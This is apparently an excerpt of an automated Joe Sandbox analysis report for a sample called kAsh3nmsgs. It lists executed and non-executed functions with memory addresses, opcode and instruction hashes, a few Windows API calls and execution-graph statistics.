                                                                                                                • Opcode Fuzzy Hash: a72b7419f0a5484ce414a1bdd585e634072817d3723f7f0adcccd59f3ed41058
                                                                                                                • Instruction Fuzzy Hash: 591136B19002488FDB20DFAAC4457EEFBF5EB88324F248429D459A7250CB79A944CFA5
                                                                                                                Function 0148E700 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0148E766
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 728e11b9c1533f0ff26131aaf42de49bdc358de05b7232196433c5d9d695b134
                                                                                                                • Instruction ID: 6c720b9b22f59e7e4943b04b07d629b23502567d50971aef9e7eff00a9b3e4a6
                                                                                                                • Opcode Fuzzy Hash: 728e11b9c1533f0ff26131aaf42de49bdc358de05b7232196433c5d9d695b134
                                                                                                                • Instruction Fuzzy Hash: E01110B6C003498FEB10EF9AC444ADEFBF8AB88324F10842AD518B7210C375A545CFA1
                                                                                                                Function 0F1811B8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0F181215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1737717003.000000000F180000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F180000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_f180000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: d18bbfaa549250f521fc101f0ab1c4b3dfd27c82ada18bad1ed17b55f78cf824
                                                                                                                • Instruction ID: ec1a6232876d6386e766a80cf7fa294bc28c496bbf448d7b7d05e8259605d4eb
                                                                                                                • Opcode Fuzzy Hash: d18bbfaa549250f521fc101f0ab1c4b3dfd27c82ada18bad1ed17b55f78cf824
                                                                                                                • Instruction Fuzzy Hash: CB11D3B58003499FDB10DF9AD545BDEFBF8EB48324F208419D558A7211C375A944CFA5
                                                                                                                Function 0142D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728703154.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_142d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c5187542bcbdafb09ce91eec455037fddcd677db0b842e95622b2c3901fd3488
                                                                                                                • Instruction ID: a59263eb6ab92099bf2fb2afc83005210188f31062edcf8b0a6a6dd79582c7b9
                                                                                                                • Opcode Fuzzy Hash: c5187542bcbdafb09ce91eec455037fddcd677db0b842e95622b2c3901fd3488
                                                                                                                • Instruction Fuzzy Hash: 9D212571904240DFDB05DF58D9C0B27BFA5FB88318F60C56AE9094B366C376D4D6CAA1
                                                                                                                Function 0143D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728839788.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_143d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 94a875e6703e1b26b14dd4df04d25376b1866836f3497642393820c95820bb9a
                                                                                                                • Instruction ID: fcf470f1d5368ba879d4699febb36e14cec3560e4653ff531514945e7ac32dd6
                                                                                                                • Opcode Fuzzy Hash: 94a875e6703e1b26b14dd4df04d25376b1866836f3497642393820c95820bb9a
                                                                                                                • Instruction Fuzzy Hash: 10212671904200EFDB05DF98D9C0B26BBA5FBC8324F60C66EE9494B366C736D446CA61
                                                                                                                Function 0143D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728839788.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_143d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0c5b4d782e7b8e4179f88947c0edde3fa03dd5e64277b4861787847ff1d738e
                                                                                                                • Instruction ID: 6d79019c44f058836965ece67977620a535f3368e4f5f380e2952adf83ed0b64
                                                                                                                • Opcode Fuzzy Hash: b0c5b4d782e7b8e4179f88947c0edde3fa03dd5e64277b4861787847ff1d738e
                                                                                                                • Instruction Fuzzy Hash: 292133B0904200DFCB15DF58D980B16FBB5EB88718F60C56AD80A4B366C336C407CA61
                                                                                                                Function 0143D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728839788.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_143d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eb43c6d032cf538b9a4a6b06f806404280a107b45bf87d86d2da42c045e252cf
                                                                                                                • Instruction ID: efa75d48b7cea19d8a30f6248d32f8357a0c29adc537d90ca95218a5e60a2293
                                                                                                                • Opcode Fuzzy Hash: eb43c6d032cf538b9a4a6b06f806404280a107b45bf87d86d2da42c045e252cf
                                                                                                                • Instruction Fuzzy Hash: 2D2180755093808FDB03CF64D594716BF71EB86218F28C5DBD8498F2A7C33A980ACB62
                                                                                                                Function 0142D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728703154.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_142d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: a41819b1cc6d150b3b1ee0288ebb8de777888d155075a215fc20642eef1ec57b
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: A111E172804280CFDB02CF54D9C4B16BF71FB84318F24C6AAD8090B266C336D49ACBA1
                                                                                                                Function 0143D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728839788.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_143d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: 1f85ea7f0a51dc4cce4b1f9308c01b34855b1066318487fc9d2fcf1996b9ee92
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: C911BB75904280DFDB02CF54C5C4B16BFA1FB88224F24C6AAD8494B3A6C33AD40ACB61
                                                                                                                Function 0142D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728703154.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_142d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 508003353578252b9616af0bcb196c30eb2d8d08c0411ff44b7dd01b2c60c0aa
                                                                                                                • Instruction ID: de2cc12956bd20290bc3a4e08e4f234f3c57e6d8ecfb444823af2961437522fd
                                                                                                                • Opcode Fuzzy Hash: 508003353578252b9616af0bcb196c30eb2d8d08c0411ff44b7dd01b2c60c0aa
                                                                                                                • Instruction Fuzzy Hash: C3012B318083909AE7105F69CD84B67BF9CDF81324F48C52BED084A2A6C23DD881C6B1
                                                                                                                Function 0142D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1728703154.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_142d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a42b207410b55f185a949ec28b18a37b0905daab6473e6f1cc2fd61b0789b4d4
                                                                                                                • Instruction ID: 73562f3b9885f6f9f79aaba8e410233e6147cf6f7b7f33e3a3a6dbed6b26f4eb
                                                                                                                • Opcode Fuzzy Hash: a42b207410b55f185a949ec28b18a37b0905daab6473e6f1cc2fd61b0789b4d4
                                                                                                                • Instruction Fuzzy Hash: E6F06875404354AEE7118E19C884B63FF98EF81734F18C45AED484A296C2799844CA71

                                                                                                                Non-executed Functions

                                                                                                                Function 0A040040 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                                • API String ID: 0-2576840827
                                                                                                                • Opcode ID: 8439a2e30449139c4cb3e11205039c9dde30782bf9196dcdbd3b79fd2904af8a
                                                                                                                • Instruction ID: 9b754990cfea92bf1a3371425e6ed029426d616fb138d0ab3dbed4f28fc74d80
                                                                                                                • Opcode Fuzzy Hash: 8439a2e30449139c4cb3e11205039c9dde30782bf9196dcdbd3b79fd2904af8a
                                                                                                                • Instruction Fuzzy Hash: C6B2C175E00228DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB359E81CF40
                                                                                                                Function 0A04001B Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TJcq$Te^q$xbaq
                                                                                                                • API String ID: 0-3225726259
                                                                                                                • Opcode ID: 3f0ef0871bebefecf69060c32fb22e18bfcaeece973d2243d8bcef8d2ce5cc09
                                                                                                                • Instruction ID: 4a815b1d561ee5b00f958c8fe4071f1cd838e4650e641677fd9d2d21f2f444cd
                                                                                                                • Opcode Fuzzy Hash: 3f0ef0871bebefecf69060c32fb22e18bfcaeece973d2243d8bcef8d2ce5cc09
                                                                                                                • Instruction Fuzzy Hash: A4C182B5E016188FDB58CF6AC9446DDBBF2BF89300F14C1EAD909AB325DA345E858F50
                                                                                                                Function 01482CD8 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: y
                                                                                                                • API String ID: 0-1623555479
                                                                                                                • Opcode ID: c1fbd0c4e92e238e7f86f37d2e922306eeb6a9ab30477159457da89902d76c2a
                                                                                                                • Instruction ID: 0e234208b6f148ab921965530f82942c93616898569fa1c63f7cbf20e1bf53dc
                                                                                                                • Opcode Fuzzy Hash: c1fbd0c4e92e238e7f86f37d2e922306eeb6a9ab30477159457da89902d76c2a
                                                                                                                • Instruction Fuzzy Hash: C541C471704645CFC750DA6DD881E6BBBF2FB84210B24882BE82AC7760D2B0E942CF01
                                                                                                                Function 0A049E20 Relevance: .3, Instructions: 318COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5539e079cae56cd4ca14ec5efedee299ae596e0fcc0143b9bd9113d06792ddf5
                                                                                                                • Instruction ID: bdb26f066d94f058170bed9a1524ef8b68f6d9f4a8d0e4977cd77287eeac644b
                                                                                                                • Opcode Fuzzy Hash: 5539e079cae56cd4ca14ec5efedee299ae596e0fcc0143b9bd9113d06792ddf5
                                                                                                                • Instruction Fuzzy Hash: 54E1F7B4E102198FCB14CFA9C5809AEFBB2FF89305F248169E415AB356D735AD41CF61
                                                                                                                Function 0A04B940 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da6d968408c96d53a175b7ae869bd0836a738e71023d7c019a8c549b184c03da
                                                                                                                • Instruction ID: b9d2c1c74290a77a2289022d904540957d5455847d6ff81403cfafda9b7e97b2
                                                                                                                • Opcode Fuzzy Hash: da6d968408c96d53a175b7ae869bd0836a738e71023d7c019a8c549b184c03da
                                                                                                                • Instruction Fuzzy Hash: B8E1D8B4E102198FCB14CFA9C5809AEBBF2FF89305F248169E415AB356DB35AD41CF61
                                                                                                                Function 0A04BD78 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 641bb486777857c6f83d6a3ee2bedc980b5ccbbb92182e308acc5b57a11a2b20
                                                                                                                • Instruction ID: 4f95a531be40b4cf2bbd1f84698e29b53ea7fac5ebdcf174c94d0938913103e5
                                                                                                                • Opcode Fuzzy Hash: 641bb486777857c6f83d6a3ee2bedc980b5ccbbb92182e308acc5b57a11a2b20
                                                                                                                • Instruction Fuzzy Hash: EAE1E7B4E111198FDB14CFA9C5809AEBBF2FF89305F248169E419AB356D730AD41CFA0
                                                                                                                Function 0A04A268 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eacaf1ba1978c1f5779211fcf1a750805c8a0d3eb6f566a88a7f418bf221ad6c
                                                                                                                • Instruction ID: a1b93e8f399288897c0208cf71f3dc810b525d341dd21260a628d15a14c98c3d
                                                                                                                • Opcode Fuzzy Hash: eacaf1ba1978c1f5779211fcf1a750805c8a0d3eb6f566a88a7f418bf221ad6c
                                                                                                                • Instruction Fuzzy Hash: 8DE1F6B4E112198FDB14CFA9C5809AEBBF2FF89305F248169E415AB356D734AD41CFA0
                                                                                                                Function 0A04A6A0 Relevance: .3, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: beb5a5d1f4ae8c2bcf119e1c564f35b895aa7180bd48ac8ae9cb02b5ee128853
                                                                                                                • Instruction ID: 35b5b266fd497ff34f054a435b1eaad2891727e122ee8a35f2157692491e5d98
                                                                                                                • Opcode Fuzzy Hash: beb5a5d1f4ae8c2bcf119e1c564f35b895aa7180bd48ac8ae9cb02b5ee128853
                                                                                                                • Instruction Fuzzy Hash: 59E1E5B4E102198FCB14CFA9C5809AEBBF2FF89305F248169E415AB356D734AD42CF61
                                                                                                                Function 0A0428E8 Relevance: .2, Instructions: 239COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2169d14cd030c6e94d774ef94fab2d8dd3ab3c45c1a0ea448f907d4750308016
                                                                                                                • Instruction ID: df78497803715fcaf4e4b613fd613945371397f583fada9f055bf194162c747d
                                                                                                                • Opcode Fuzzy Hash: 2169d14cd030c6e94d774ef94fab2d8dd3ab3c45c1a0ea448f907d4750308016
                                                                                                                • Instruction Fuzzy Hash: E2A1C2B4E0422CDBDB24CFAAC8447EDBBF6BF89300F10916AE509A7251DB745985CF40
                                                                                                                Function 014836E0 Relevance: .2, Instructions: 212COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d5360cd5dfa18f1db17d5e098a0f4dc7df7c3dcc247ce86a9a31b9e76846306
                                                                                                                • Instruction ID: 929d6ef87b825a70fe8f7c4eb702be6cc2a13b40a592c9bd3304d01f2f7062a4
                                                                                                                • Opcode Fuzzy Hash: 6d5360cd5dfa18f1db17d5e098a0f4dc7df7c3dcc247ce86a9a31b9e76846306
                                                                                                                • Instruction Fuzzy Hash: 5D71D071E1420A8FCB40EFA8C8815AEFBF5FB89610B55C16BD41AEB261D274DD42CB91
                                                                                                                Function 0A04B92F Relevance: .1, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3b70ea61fded9fcdeda2d2b1dc8e3022bd5e138b69ba08f0d2765a8b5a810c02
                                                                                                                • Instruction ID: 04167074e129d24bcc4815d8e265418139ceb34fffde7957c63e00cf834f91b9
                                                                                                                • Opcode Fuzzy Hash: 3b70ea61fded9fcdeda2d2b1dc8e3022bd5e138b69ba08f0d2765a8b5a810c02
                                                                                                                • Instruction Fuzzy Hash: A8512AB0E102198FCB14CFA9C5805AEFBF2FF8A304F24C1A9D458A7256D731A942CF60
                                                                                                                Function 0A04BD68 Relevance: .1, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d20f1a15b0a8e24de048bd15cab6ba5d031e9f489d3e572e33611b1270b4a29
                                                                                                                • Instruction ID: 2f60ee0ef70d3c1b499b68213cf7ca904bf869de413a68f1d650b2c4949d4ed7
                                                                                                                • Opcode Fuzzy Hash: 5d20f1a15b0a8e24de048bd15cab6ba5d031e9f489d3e572e33611b1270b4a29
                                                                                                                • Instruction Fuzzy Hash: CD51F9B4E102198BDB14CFA9C5845AEFBF2FF89304F24C169D418A7256D731AD41CFA1
                                                                                                                Function 0A04A258 Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1736460805.000000000A040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A040000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a040000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ae4d9db1681451e2fd8cdbb463c2297494dc5c28f6d504f185512963075e220
                                                                                                                • Instruction ID: 95211fbf8ac558c945f77ee89a01826229223c289a15ec31a0503dbd4620e580
                                                                                                                • Opcode Fuzzy Hash: 8ae4d9db1681451e2fd8cdbb463c2297494dc5c28f6d504f185512963075e220
                                                                                                                • Instruction Fuzzy Hash: C25139B0E142198FDB14CFA9C5805AEFBF2FF89305F24C169E408AB256D731A941CFA0
                                                                                                                Function 01483818 Relevance: .1, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 807bbf873ddabe4ace812fa74709fb7651c5fe5c2073b6e85e450c18f0e0b605
                                                                                                                • Instruction ID: c422a1788b07f098460340c7677850118fab01ded517ec509f3a52c99ca2108f
                                                                                                                • Opcode Fuzzy Hash: 807bbf873ddabe4ace812fa74709fb7651c5fe5c2073b6e85e450c18f0e0b605
                                                                                                                • Instruction Fuzzy Hash: 23418131F2421A8FCF44DFA8C9816AEBBF5FB89610B15816BD41AEB361C274DD01CB91
                                                                                                                Function 01482CC8 Relevance: .1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c950db1fb033b1df3f28ae63a6cdabff3dc687681900f447d39bb7c13a9856c2
                                                                                                                • Instruction ID: 9e7aa5a6d64b7e626d8d0a8fbb8b358594b3a9a3114ee373d39d64d96ae1b982
                                                                                                                • Opcode Fuzzy Hash: c950db1fb033b1df3f28ae63a6cdabff3dc687681900f447d39bb7c13a9856c2
                                                                                                                • Instruction Fuzzy Hash: AC41A171A04605CFC754DB6DC881A6BBBF2FF84220B14886BE82ACB671D2B4D942CB11
                                                                                                                Function 014836D1 Relevance: .1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1729500262.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1480000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e637c98adf243cf5297437bf86ab6685492b4c131e96629fa6d4e8ec2d60d29d
                                                                                                                • Instruction ID: 032613c6cf205f5e0649841195a44d02810b8eee03656ee47e438ed33d280e5b
                                                                                                                • Opcode Fuzzy Hash: e637c98adf243cf5297437bf86ab6685492b4c131e96629fa6d4e8ec2d60d29d
                                                                                                                • Instruction Fuzzy Hash: 182104B1A002468FCB44FFA8C8914BEFBB6FBC5B10B41C527C415EB261C274DE428B81

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.8%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:39
                                                                                                                Total number of Limit Nodes:5
                                                                                                                execution_graph 39971 117fef8 39972 117ff20 39971->39972 39974 117ff90 39972->39974 39975 692ff2b 39972->39975 39977 692ff42 39975->39977 39978 692fd09 39975->39978 39976 692fd66 39976->39974 39977->39974 39978->39976 39982 117e708 39978->39982 39986 117e6f8 39978->39986 39979 692fe3f 39979->39974 39983 117e70e 39982->39983 39990 117eb30 39983->39990 39984 117e716 39984->39979 39987 117e708 39986->39987 39989 117eb30 GlobalMemoryStatusEx 39987->39989 39988 117e716 39988->39979 39989->39988 39991 117eb40 39990->39991 39992 117eb4d 39991->39992 39993 117ec5e GlobalMemoryStatusEx 39991->39993 39992->39984 39994 117ec8e 39993->39994 39994->39984 39995 1170848 39997 117084e 39995->39997 39996 117091b 39997->39996 39999 1171380 39997->39999 40001 1171396 39999->40001 40000 1171484 40000->39997 40001->40000 40003 1177ea8 40001->40003 40004 1177eb2 40003->40004 40005 1177ecc 40004->40005 40008 692fa98 40004->40008 40013 692fa88 40004->40013 40005->40001 40010 692faad 40008->40010 40009 692fcc2 40009->40005 40010->40009 40011 692ff2b GlobalMemoryStatusEx 40010->40011 40012 692fcd9 GlobalMemoryStatusEx 40010->40012 40011->40010 40012->40010 40017 692fa98 40013->40017 40014 692fcc2 40014->40005 40015 692fcd9 GlobalMemoryStatusEx 40015->40017 40016 692ff2b GlobalMemoryStatusEx 40016->40017 40017->40014 40017->40015 40017->40016

                                                                                                                Executed Functions

                                                                                                                Function 069230E0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
